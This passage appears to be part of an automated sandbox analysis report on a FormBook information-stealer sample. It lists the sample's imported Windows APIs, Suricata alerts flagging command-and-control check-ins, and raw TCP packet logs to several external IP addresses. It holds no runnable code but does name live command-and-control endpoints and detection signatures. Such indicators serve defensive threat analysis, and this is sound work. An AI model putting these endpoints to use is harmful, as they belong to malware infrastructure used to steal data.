GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                    GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                    OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishGreat Britain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-01-10T09:09:55.087538+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650026172.67.148.21680TCP
                                                                    2025-01-10T09:09:55.087538+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650026172.67.148.21680TCP
                                                                    2025-01-10T09:10:56.986600+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649982172.65.235.9780TCP
                                                                    2025-01-10T09:10:56.986600+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649982172.65.235.9780TCP
                                                                    2025-01-10T09:11:12.568089+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649983192.64.119.10980TCP
                                                                    2025-01-10T09:11:15.182909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649985192.64.119.10980TCP
                                                                    2025-01-10T09:11:17.715087+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649986192.64.119.10980TCP
                                                                    2025-01-10T09:11:20.332386+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649987192.64.119.10980TCP
                                                                    2025-01-10T09:11:20.332386+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649987192.64.119.10980TCP
                                                                    2025-01-10T09:11:26.645856+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649988188.114.96.380TCP
                                                                    2025-01-10T09:11:29.180718+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649989188.114.96.380TCP
                                                                    2025-01-10T09:11:31.729322+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990188.114.96.380TCP
                                                                    2025-01-10T09:11:34.316833+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649991188.114.96.380TCP
                                                                    2025-01-10T09:11:34.316833+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649991188.114.96.380TCP
                                                                    2025-01-10T09:11:40.868995+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999247.83.1.9080TCP
                                                                    2025-01-10T09:11:43.415794+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999347.83.1.9080TCP
                                                                    2025-01-10T09:11:45.976305+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999447.83.1.9080TCP
                                                                    2025-01-10T09:11:48.625013+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64999547.83.1.9080TCP
                                                                    2025-01-10T09:11:48.625013+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64999547.83.1.9080TCP
                                                                    2025-01-10T09:12:11.142217+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997162.0.236.16980TCP
                                                                    2025-01-10T09:12:14.211745+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998162.0.236.16980TCP
                                                                    2025-01-10T09:12:16.804868+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999162.0.236.16980TCP
                                                                    2025-01-10T09:12:19.334363+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650000162.0.236.16980TCP
                                                                    2025-01-10T09:12:19.334363+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650000162.0.236.16980TCP
                                                                    2025-01-10T09:12:25.801396+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001192.186.58.3180TCP
                                                                    2025-01-10T09:12:28.347277+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002192.186.58.3180TCP
                                                                    2025-01-10T09:12:30.919683+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650003192.186.58.3180TCP
                                                                    2025-01-10T09:12:33.532223+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650004192.186.58.3180TCP
                                                                    2025-01-10T09:12:33.532223+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650004192.186.58.3180TCP
                                                                    2025-01-10T09:12:40.589250+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005104.21.64.180TCP
                                                                    2025-01-10T09:12:43.099257+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006104.21.64.180TCP
                                                                    2025-01-10T09:12:45.679534+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007104.21.64.180TCP
                                                                    2025-01-10T09:12:48.218716+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650008104.21.64.180TCP
                                                                    2025-01-10T09:12:48.218716+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650008104.21.64.180TCP
                                                                    2025-01-10T09:13:10.285311+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001176.223.67.18980TCP
                                                                    2025-01-10T09:13:12.831793+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001276.223.67.18980TCP
                                                                    2025-01-10T09:13:15.396028+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001376.223.67.18980TCP
                                                                    2025-01-10T09:13:18.082264+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65001476.223.67.18980TCP
                                                                    2025-01-10T09:13:18.082264+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65001476.223.67.18980TCP
                                                                    2025-01-10T09:13:24.945983+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650015103.247.11.20480TCP
                                                                    2025-01-10T09:13:27.495857+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650016103.247.11.20480TCP
                                                                    2025-01-10T09:13:30.418691+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650017103.247.11.20480TCP
                                                                    2025-01-10T09:13:32.878782+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650018103.247.11.20480TCP
                                                                    2025-01-10T09:13:32.878782+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650018103.247.11.20480TCP
                                                                    2025-01-10T09:13:38.849752+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650019136.243.64.14780TCP
                                                                    2025-01-10T09:13:41.488788+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650020136.243.64.14780TCP
                                                                    2025-01-10T09:13:44.064503+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650021136.243.64.14780TCP
                                                                    2025-01-10T09:13:46.617733+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650022136.243.64.14780TCP
                                                                    2025-01-10T09:13:46.617733+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650022136.243.64.14780TCP
                                                                    2025-01-10T09:14:01.430656+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650023172.67.148.21680TCP
                                                                    2025-01-10T09:14:04.048534+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650024172.67.148.21680TCP
                                                                    2025-01-10T09:14:06.587029+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650025172.67.148.21680TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 10, 2025 09:10:56.158442974 CET4998280192.168.2.6172.65.235.97
                                                                    Jan 10, 2025 09:10:56.163436890 CET8049982172.65.235.97192.168.2.6
                                                                    Jan 10, 2025 09:10:56.163661957 CET4998280192.168.2.6172.65.235.97
                                                                    Jan 10, 2025 09:10:56.173058033 CET4998280192.168.2.6172.65.235.97
                                                                    Jan 10, 2025 09:10:56.177913904 CET8049982172.65.235.97192.168.2.6
                                                                    Jan 10, 2025 09:10:56.984431028 CET8049982172.65.235.97192.168.2.6
                                                                    Jan 10, 2025 09:10:56.986498117 CET8049982172.65.235.97192.168.2.6
                                                                    Jan 10, 2025 09:10:56.986599922 CET4998280192.168.2.6172.65.235.97
                                                                    Jan 10, 2025 09:10:56.994817972 CET4998280192.168.2.6172.65.235.97
                                                                    Jan 10, 2025 09:10:56.999630928 CET8049982172.65.235.97192.168.2.6
                                                                    Jan 10, 2025 09:11:12.084891081 CET4998380192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:12.089812040 CET8049983192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:12.089903116 CET4998380192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:12.101990938 CET4998380192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:12.106755018 CET8049983192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:12.567893982 CET8049983192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:12.568039894 CET8049983192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:12.568089008 CET4998380192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:13.654575109 CET4998380192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:14.682054043 CET4998580192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:14.687081099 CET8049985192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:14.687416077 CET4998580192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:14.702112913 CET4998580192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:14.706942081 CET8049985192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:15.182732105 CET8049985192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:15.182816029 CET8049985192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:15.182909012 CET4998580192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:16.213134050 CET4998580192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:17.231631994 CET4998680192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:17.236430883 CET8049986192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:17.236519098 CET4998680192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:17.252322912 CET4998680192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:17.257991076 CET8049986192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:17.258301020 CET8049986192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:17.714900017 CET8049986192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:17.715018988 CET8049986192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:17.715086937 CET4998680192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:18.759495974 CET4998680192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:19.841415882 CET4998780192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:19.846226931 CET8049987192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:19.846347094 CET4998780192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:19.991816998 CET4998780192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:19.996669054 CET8049987192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:20.332204103 CET8049987192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:20.332329988 CET8049987192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:20.332386017 CET4998780192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:20.334806919 CET4998780192.168.2.6192.64.119.109
                                                                    Jan 10, 2025 09:11:20.339632988 CET8049987192.64.119.109192.168.2.6
                                                                    Jan 10, 2025 09:11:25.487834930 CET4998880192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:25.492594004 CET8049988188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:25.492660046 CET4998880192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:25.520510912 CET4998880192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:25.525291920 CET8049988188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:26.645780087 CET8049988188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:26.645797968 CET8049988188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:26.645855904 CET4998880192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:26.646106958 CET8049988188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:26.646157026 CET4998880192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:27.040808916 CET4998880192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:28.059533119 CET4998980192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:28.064513922 CET8049989188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:28.064676046 CET4998980192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:28.078591108 CET4998980192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:28.083441019 CET8049989188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:29.180578947 CET8049989188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:29.180603981 CET8049989188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:29.180619955 CET8049989188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:29.180717945 CET4998980192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:29.180768967 CET4998980192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:29.587753057 CET4998980192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:30.606906891 CET4999080192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:30.611903906 CET8049990188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:30.611994028 CET4999080192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:30.627504110 CET4999080192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:30.632766008 CET8049990188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:30.632778883 CET8049990188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:31.729211092 CET8049990188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:31.729276896 CET8049990188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:31.729321957 CET4999080192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:31.729387045 CET8049990188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:31.729429960 CET4999080192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:32.135055065 CET4999080192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:33.153728008 CET4999180192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:33.158654928 CET8049991188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:33.158739090 CET4999180192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:33.168490887 CET4999180192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:33.173329115 CET8049991188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:34.316623926 CET8049991188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:34.316644907 CET8049991188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:34.316833019 CET4999180192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:34.317051888 CET8049991188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:34.317114115 CET4999180192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:34.320724010 CET4999180192.168.2.6188.114.96.3
                                                                    Jan 10, 2025 09:11:34.325581074 CET8049991188.114.96.3192.168.2.6
                                                                    Jan 10, 2025 09:11:39.345541000 CET4999280192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:39.350440025 CET804999247.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:39.350528955 CET4999280192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:39.365300894 CET4999280192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:39.370132923 CET804999247.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:40.868994951 CET4999280192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:40.874006987 CET804999247.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:40.874062061 CET4999280192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:41.887641907 CET4999380192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:41.892810106 CET804999347.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:41.892965078 CET4999380192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:41.907010078 CET4999380192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:41.911909103 CET804999347.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:43.415793896 CET4999380192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:43.421056032 CET804999347.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:43.421118021 CET4999380192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:44.433984041 CET4999480192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:44.439089060 CET804999447.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:44.439243078 CET4999480192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:44.451373100 CET4999480192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:44.456367016 CET804999447.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:44.456464052 CET804999447.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:45.976305008 CET4999480192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:45.981631994 CET804999447.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:45.981718063 CET4999480192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:46.982043982 CET4999580192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:46.987093925 CET804999547.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:46.987206936 CET4999580192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:46.996006966 CET4999580192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:47.000866890 CET804999547.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:48.624751091 CET804999547.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:48.624793053 CET804999547.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:11:48.625013113 CET4999580192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:48.631419897 CET4999580192.168.2.647.83.1.90
                                                                    Jan 10, 2025 09:11:48.638113976 CET804999547.83.1.90192.168.2.6
                                                                    Jan 10, 2025 09:12:10.530010939 CET4999780192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:10.535003901 CET8049997162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:10.540633917 CET4999780192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:10.583653927 CET4999780192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:10.588515997 CET8049997162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:11.142097950 CET8049997162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:11.142119884 CET8049997162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:11.142216921 CET4999780192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:12.087677956 CET4999780192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:13.609432936 CET4999880192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:13.614619970 CET8049998162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:13.614707947 CET4999880192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:13.634260893 CET4999880192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:13.639194012 CET8049998162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:14.211534023 CET8049998162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:14.211597919 CET8049998162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:14.211745024 CET4999880192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:15.150866985 CET4999880192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:16.171201944 CET4999980192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:16.183053017 CET8049999162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:16.187207937 CET4999980192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:16.227170944 CET4999980192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:16.232023954 CET8049999162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:16.232314110 CET8049999162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:16.804718018 CET8049999162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:16.804816961 CET8049999162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:16.804867983 CET4999980192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:17.728481054 CET4999980192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:18.747586966 CET5000080192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:18.752530098 CET8050000162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:18.752624035 CET5000080192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:18.766303062 CET5000080192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:18.771250963 CET8050000162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:19.334186077 CET8050000162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:19.334249020 CET8050000162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:19.334362984 CET5000080192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:19.484668016 CET5000080192.168.2.6162.0.236.169
                                                                    Jan 10, 2025 09:12:19.489708900 CET8050000162.0.236.169192.168.2.6
                                                                    Jan 10, 2025 09:12:24.852394104 CET5000180192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:24.857305050 CET8050001192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:24.857382059 CET5000180192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:24.897656918 CET5000180192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:24.902549982 CET8050001192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:25.801300049 CET8050001192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:25.801351070 CET8050001192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:25.801395893 CET5000180192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:26.400248051 CET5000180192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:27.418798923 CET5000280192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:27.423803091 CET8050002192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:27.423898935 CET5000280192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:27.439080954 CET5000280192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:27.444186926 CET8050002192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:28.345824957 CET8050002192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:28.345875978 CET8050002192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:28.347276926 CET5000280192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:28.947254896 CET5000280192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:29.967364073 CET5000380192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:29.972284079 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:29.975172043 CET5000380192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:29.985951900 CET5000380192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:29.990895987 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:29.990951061 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:30.919533014 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:30.919624090 CET8050003192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:30.919682980 CET5000380192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:31.494303942 CET5000380192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.512197971 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.517404079 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:32.519285917 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.527190924 CET5000480192.168.2.6192.186.58.31
                                                                    Jan 10, 2025 09:12:32.532264948 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.531900883 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.531958103 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.531994104 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532027006 CET8050004192.186.58.31192.168.2.6
                                                                    Jan 10, 2025 09:12:33.532062054 CET8050004192.186.58.31192.168.2.6
